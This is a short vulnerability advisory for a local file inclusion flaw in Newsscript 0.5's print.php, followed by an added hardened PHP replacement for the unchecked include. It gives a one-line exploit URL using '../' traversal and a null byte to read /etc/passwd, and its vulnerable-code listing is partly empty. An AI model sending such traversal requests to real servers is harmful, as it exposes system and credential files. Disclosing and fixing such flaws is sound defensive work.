Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability



# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability"

# Vulnerable version:

--- "Newsscript version 0.5"

# Vendor URL:

--- Email - mail@webmaster-journal.com
--- Website - http://webmaster-journal.com

# Available in:

--- http://www.comscripts.com/scripts/php.wm-news.203.html

# Vulnerability:

--- Vulnerable code in print/print.php

--- The $ide variable is not sanitized and can be used to include files from local resources

--- 1
--- 2
--- 3
---
---
--- 27	     include($file_name);

# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com
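
A hardened replacement for the unchecked include on line 27 of print/print.php, added here as an example; it is not Newsscript's code and not part of the original advisory. The advisory does not show how $file_name is built from $ide, so the NEWS_DIR directory, the ".php" suffix, the id character set, the use of $_GET and the resolve_news_file() helper are all assumptions.

```php
<?php
// Added example, not Newsscript's code. NEWS_DIR, the ".php" suffix and the
// id character set are assumptions; the page shows only include($file_name).
const NEWS_DIR = __DIR__ . '/news';

/**
 * Map a request-supplied id to a file inside $baseDir, or return null.
 */
function resolve_news_file(string $ide, string $baseDir = NEWS_DIR): ?string
{
    // Allowlist: short ids made of letters, digits, "_" and "-". This rejects
    // "/", "\", "." and NUL bytes, so "../" sequences and the "%00" suffix
    // from the advisory's request never reach the filesystem.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ide) !== 1) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // misconfigured base directory: fail closed
    }

    // realpath() resolves symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $ide . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Defence in depth: the resolved path must still sit under the base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Used in place of the unchecked include (assumes the id arrives via $_GET).
$ide = $_GET['ide'] ?? '';
$file_name = resolve_news_file(is_string($ide) ? $ide : '');
if ($file_name === null) {
    http_response_code(404);
    exit('Not found');
}
include $file_name;
```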
